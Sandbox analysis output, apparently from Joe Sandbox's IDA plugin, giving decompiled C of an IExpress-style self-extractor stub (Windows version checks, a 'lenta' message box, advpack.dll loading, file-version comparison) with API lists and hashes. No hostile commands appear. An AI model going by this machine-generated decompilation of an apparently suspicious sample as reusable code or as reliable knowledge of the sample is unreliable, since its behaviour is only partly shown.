                                                                                                                                                                                                                                            				CHAR* _t91;
                                                                                                                                                                                                                                            				CHAR* _t94;
                                                                                                                                                                                                                                            				int _t97;
                                                                                                                                                                                                                                            				CHAR* _t98;
                                                                                                                                                                                                                                            				signed char _t99;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				signed short _t107;
                                                                                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                                                                                            				short _t113;
                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                            				signed char _t115;
                                                                                                                                                                                                                                            				short _t119;
                                                                                                                                                                                                                                            				CHAR* _t123;
                                                                                                                                                                                                                                            				CHAR* _t124;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                                                                                            				signed int _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				CHAR* _t138;
                                                                                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t72 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                            				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            				_t115 = __ecx;
                                                                                                                                                                                                                                            				_t135 = 0;
                                                                                                                                                                                                                                            				_v432 = __ecx;
                                                                                                                                                                                                                                            				_t138 = 0;
                                                                                                                                                                                                                                            				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                            					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                            					_t119 = 2;
                                                                                                                                                                                                                                            					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                            					__eflags = _t77;
                                                                                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                                                                                            						_t119 = 0;
                                                                                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                                                                                            						 *0x8d8184 = 1;
                                                                                                                                                                                                                                            						 *0x8d8180 = 1;
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						 *0x8d9a40 = _t119;
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						__eflags =  *0x8d8a34 - _t138; // 0x0
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t115;
                                                                                                                                                                                                                                            						if(_t115 == 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v428 = _t135;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                            						_t11 =  &_v420;
                                                                                                                                                                                                                                            						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                            						__eflags =  *_t11;
                                                                                                                                                                                                                                            						_v440 = _t115;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                            							_v436 = E008D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                            							_t91 = E008D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                            							_t123 = _v436;
                                                                                                                                                                                                                                            							_t133 = 0x54d;
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 < 0) {
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								__eflags = _v420 - 1;
                                                                                                                                                                                                                                            								if(_v420 == 1) {
                                                                                                                                                                                                                                            									_t138 = 0x54c;
                                                                                                                                                                                                                                            									L36:
                                                                                                                                                                                                                                            									__eflags = _t138;
                                                                                                                                                                                                                                            									if(_t138 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            										if(_t138 == _t133) {
                                                                                                                                                                                                                                            											L30:
                                                                                                                                                                                                                                            											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                            											_t115 = 0;
                                                                                                                                                                                                                                            											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                            											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            											_t133 = _v432;
                                                                                                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                                                                                                            												_t124 = _v440;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                            												_v420 =  &_v268;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t124;
                                                                                                                                                                                                                                            											if(_t124 == 0) {
                                                                                                                                                                                                                                            												_t135 = _v436;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t99 = _t124[0x30];
                                                                                                                                                                                                                                            												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                            												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                            												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                            													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t115 = 0x104;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0x8d8a38 & 0x00000001;
                                                                                                                                                                                                                                            											if(( *0x8d8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            												L64:
                                                                                                                                                                                                                                            												_push(0);
                                                                                                                                                                                                                                            												_push(0x30);
                                                                                                                                                                                                                                            												_push(_v420);
                                                                                                                                                                                                                                            												_push("lenta");
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												__eflags = _t135;
                                                                                                                                                                                                                                            												if(_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												__eflags =  *_t135;
                                                                                                                                                                                                                                            												if( *_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												MessageBeep(0);
                                                                                                                                                                                                                                            												_t94 = E008D681F(_t115);
                                                                                                                                                                                                                                            												__eflags = _t94;
                                                                                                                                                                                                                                            												if(_t94 == 0) {
                                                                                                                                                                                                                                            													L57:
                                                                                                                                                                                                                                            													0x180030 = 0x30;
                                                                                                                                                                                                                                            													L58:
                                                                                                                                                                                                                                            													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E008D67C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E008D28E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x8d9a40 = _t119;
						 *0x8d8184 = 1;
						 *0x8d8180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x8d9a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x8d8184 = _t135;
							 *0x8d8180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t138 = 0x4b4;
                                                                                                                                                                                                                                            					L44:
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					L65:
                                                                                                                                                                                                                                            					_t133 = _t138;
                                                                                                                                                                                                                                            					E008D44B9(0, _t138);
                                                                                                                                                                                                                                            					L66:
                                                                                                                                                                                                                                            					return E008D6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x008d3a09
                                                                                                                                                                                                                                            0x008d39fc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d39fc
                                                                                                                                                                                                                                            0x008d39d3
                                                                                                                                                                                                                                            0x008d39d8
                                                                                                                                                                                                                                            0x008d39da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d39dc
                                                                                                                                                                                                                                            0x008d39b6
                                                                                                                                                                                                                                            0x008d3955
                                                                                                                                                                                                                                            0x008d395b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3961
                                                                                                                                                                                                                                            0x008d3963
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3969
                                                                                                                                                                                                                                            0x008d3969
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3969
                                                                                                                                                                                                                                            0x008d3915
                                                                                                                                                                                                                                            0x008d3915
                                                                                                                                                                                                                                            0x008d391b
                                                                                                                                                                                                                                            0x008d391f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d392d
                                                                                                                                                                                                                                            0x008d3933
                                                                                                                                                                                                                                            0x008d3938
                                                                                                                                                                                                                                            0x008d393a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3940
                                                                                                                                                                                                                                            0x008d3946
                                                                                                                                                                                                                                            0x008d394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d38f2
                                                                                                                                                                                                                                            0x008d3843
                                                                                                                                                                                                                                            0x008d3845
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d384b
                                                                                                                                                                                                                                            0x008d384d
                                                                                                                                                                                                                                            0x008d3883
                                                                                                                                                                                                                                            0x008d3885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d389a
                                                                                                                                                                                                                                            0x008d389e
                                                                                                                                                                                                                                            0x008d389e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d38a0
                                                                                                                                                                                                                                            0x008d38a0
                                                                                                                                                                                                                                            0x008d38a2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d38a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d38a4
                                                                                                                                                                                                                                            0x008d384f
                                                                                                                                                                                                                                            0x008d3851
                                                                                                                                                                                                                                            0x008d3857
                                                                                                                                                                                                                                            0x008d386e
                                                                                                                                                                                                                                            0x008d3877
                                                                                                                                                                                                                                            0x008d387b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3881
                                                                                                                                                                                                                                            0x008d3859
                                                                                                                                                                                                                                            0x008d385c
                                                                                                                                                                                                                                            0x008d3862
                                                                                                                                                                                                                                            0x008d3866
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3868
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d38f4
                                                                                                                                                                                                                                            0x008d38f4
                                                                                                                                                                                                                                            0x008d38f5
                                                                                                                                                                                                                                            0x008d38fb
                                                                                                                                                                                                                                            0x008d3901
                                                                                                                                                                                                                                            0x008d3901
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d390a
                                                                                                                                                                                                                                            0x008d374b
                                                                                                                                                                                                                                            0x008d374e
                                                                                                                                                                                                                                            0x008d375c
                                                                                                                                                                                                                                            0x008d3764
                                                                                                                                                                                                                                            0x008d3769
                                                                                                                                                                                                                                            0x008d376e
                                                                                                                                                                                                                                            0x008d3771
                                                                                                                                                                                                                                            0x008d379c
                                                                                                                                                                                                                                            0x008d379f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d37a3
                                                                                                                                                                                                                                            0x008d37a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d37a4
                                                                                                                                                                                                                                            0x008d3773
                                                                                                                                                                                                                                            0x008d3777
                                                                                                                                                                                                                                            0x008d3778
                                                                                                                                                                                                                                            0x008d377f
                                                                                                                                                                                                                                            0x008d3781

APIs
• GetVersionExA.KERNEL32(?,00000000,?,?), ref: 008D3723
• MessageBeep.USER32(00000000), ref: 008D39C3
• MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 008D39F1
Strings
Memory Dump Source
• Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_file.jbxd
Similarity
• API ID: Message$BeepVersion
• String ID: 3$lenta
• API String ID: 2519184315-4216304122
• Opcode ID: 2fc02f71d996e8b4b999eee34d246ff2f27d6c68985c740c84dc9bce453d877d
• Instruction ID: 126b29f84d4589ad5f9a9dde4a516676a0fd00e2bbae86859e43498ce6ee0bbf
• Opcode Fuzzy Hash: 2fc02f71d996e8b4b999eee34d246ff2f27d6c68985c740c84dc9bce453d877d
• Instruction Fuzzy Hash: 9F91C3B1B01228ABDB758B15CC91BAA77B1FB45314F1503ABD889EB351DB708F81DB42
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%
E008D6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
	signed int _v8;
	char _v268;
	void* __edi;
	signed int _t9;
	signed char _t14;
	struct HINSTANCE__* _t15;
	void* _t18;
	CHAR* _t26;
	void* _t27;
	signed int _t28;

	_t27 = __esi;
	_t18 = __ebx;
	_t9 =  *0x8d8004; // 0x12cb0cef
	_v8 = _t9 ^ _t28;
	_push(__ecx);
	E008D1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
	_t26 = "advpack.dll";
	E008D658A( &_v268, 0x104, _t26);
	_t14 = GetFileAttributesA( &_v268);
	if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
		_t15 = LoadLibraryA(_t26);
	} else {
		_t15 = LoadLibraryExA( &_v268, 0, 8);
	}
	return E008D6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
}














APIs
• GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 008D64DF
• LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 008D64F9
• LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 008D6502
Strings
Memory Dump Source
• Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_file.jbxd
Similarity
• API ID: LibraryLoad$AttributesFile
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
• API String ID: 438848745-3680919256
• Opcode ID: beab8c2dea6fb838aebdbd660a6fb5d190c8117ce3ebb311b8a8d052147d991c
• Instruction ID: 15e19756e5293edd89924fbd337b2d54ff1309442a29d2fd8380a621c21fb779
• Opcode Fuzzy Hash: beab8c2dea6fb838aebdbd660a6fb5d190c8117ce3ebb311b8a8d052147d991c
• Instruction Fuzzy Hash: 4A01AD70A00108ABDB149B68EC49EEA7378FB60310F500397F585D22D4EE709EDA8A52
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E008D28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
	void* _v8;
	char* _v12;
	intOrPtr _v16;
	void* _v20;
	intOrPtr _v24;
	int _v28;
	int _v32;
	void* _v36;
	int _v40;
	void* _v44;
	intOrPtr _v48;
	intOrPtr _v52;
	intOrPtr _v56;
	intOrPtr _v60;
                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                            				long _t68;
                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                                            				intOrPtr _t99;
                                                                                                                                                                                                                                            				int _t101;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                                            				_t99 = __ecx;
                                                                                                                                                                                                                                            				_t106 = 0;
                                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				_t103 = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_t106 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t62 = 0;
                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                            						if(E008D2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                            						_v28 = _t68;
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_t99 = _v16;
                                                                                                                                                                                                                                            							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                            							_t93 = _v24;
                                                                                                                                                                                                                                            							_t87 = _v20;
                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                            								goto L18;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                            							if(_t103 != 0) {
                                                                                                                                                                                                                                            								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                            								_v36 = _t73;
                                                                                                                                                                                                                                            								if(_t73 != 0) {
                                                                                                                                                                                                                                            									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                            										L15:
                                                                                                                                                                                                                                            										GlobalUnlock(_t103);
                                                                                                                                                                                                                                            										_t99 = _v16;
                                                                                                                                                                                                                                            										L18:
                                                                                                                                                                                                                                            										_t87 = _t87 + 1;
                                                                                                                                                                                                                                            										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										_v20 = _t87;
                                                                                                                                                                                                                                            										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L19;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t79 = _v44;
                                                                                                                                                                                                                                            										_t88 = _t106;
                                                                                                                                                                                                                                            										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                            										_t101 = _v28;
                                                                                                                                                                                                                                            										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                            										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                            										_t97 = _v48;
                                                                                                                                                                                                                                            										_v36 = _t83;
                                                                                                                                                                                                                                            										_t109 = _t83;
                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E008D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E008D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                            											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                            											_t88 = _t88 + 4;
                                                                                                                                                                                                                                            										} while (_t88 < 8);
                                                                                                                                                                                                                                            										_t87 = _v20;
                                                                                                                                                                                                                                            										_t106 = 0;
                                                                                                                                                                                                                                            										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                            											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                            												GlobalUnlock(_t103);
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												goto L15;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L15;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L20:
                                                                                                                                                                                                                                            				 *_a8 = _t87;
                                                                                                                                                                                                                                            				if(_t103 != 0) {
                                                                                                                                                                                                                                            					GlobalFree(_t103);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t106;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x008d294a
                                                                                                                                                                                                                                            0x008d294f
                                                                                                                                                                                                                                            0x008d2a2f
                                                                                                                                                                                                                                            0x008d2a32
                                                                                                                                                                                                                                            0x008d2a34
                                                                                                                                                                                                                                            0x008d2a37
                                                                                                                                                                                                                                            0x008d2a41
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2955
                                                                                                                                                                                                                                            0x008d295e
                                                                                                                                                                                                                                            0x008d2962
                                                                                                                                                                                                                                            0x008d2969
                                                                                                                                                                                                                                            0x008d296f
                                                                                                                                                                                                                                            0x008d2974
                                                                                                                                                                                                                                            0x008d298c
                                                                                                                                                                                                                                            0x008d2a20
                                                                                                                                                                                                                                            0x008d2a21
                                                                                                                                                                                                                                            0x008d2a27
                                                                                                                                                                                                                                            0x008d2a4c
                                                                                                                                                                                                                                            0x008d2a4f
                                                                                                                                                                                                                                            0x008d2a50
                                                                                                                                                                                                                                            0x008d2a53
                                                                                                                                                                                                                                            0x008d2a56
                                                                                                                                                                                                                                            0x008d2a5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d29b2
                                                                                                                                                                                                                                            0x008d29b2
                                                                                                                                                                                                                                            0x008d29b5
                                                                                                                                                                                                                                            0x008d29bd
                                                                                                                                                                                                                                            0x008d29c3
                                                                                                                                                                                                                                            0x008d29cc
                                                                                                                                                                                                                                            0x008d29d5
                                                                                                                                                                                                                                            0x008d29d7
                                                                                                                                                                                                                                            0x008d29da
                                                                                                                                                                                                                                            0x008d29dd
                                                                                                                                                                                                                                            0x008d29df
                                                                                                                                                                                                                                            0x008d29ec
                                                                                                                                                                                                                                            0x008d29f8
                                                                                                                                                                                                                                            0x008d29fc
                                                                                                                                                                                                                                            0x008d29ff
                                                                                                                                                                                                                                            0x008d2a02
                                                                                                                                                                                                                                            0x008d2a07
                                                                                                                                                                                                                                            0x008d2a0a
                                                                                                                                                                                                                                            0x008d2a0f
                                                                                                                                                                                                                                            0x008d2a19
                                                                                                                                                                                                                                            0x008d2a81
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2a0f
                                                                                                                                                                                                                                            0x008d298c
                                                                                                                                                                                                                                            0x008d2974
                                                                                                                                                                                                                                            0x008d2962
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d294f
                                                                                                                                                                                                                                            0x008d2912
                                                                                                                                                                                                                                            0x008d2a65
                                                                                                                                                                                                                                            0x008d2a68
                                                                                                                                                                                                                                            0x008d2a6c
                                                                                                                                                                                                                                            0x008d2a6f
                                                                                                                                                                                                                                            0x008d2a6f
                                                                                                                                                                                                                                            0x008d2a7d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 008D2A6F
                                                                                                                                                                                                                                              • Part of subcall function 008D2773: CharUpperA.USER32(12CB0CEF,00000000,00000000,00000000), ref: 008D27A8
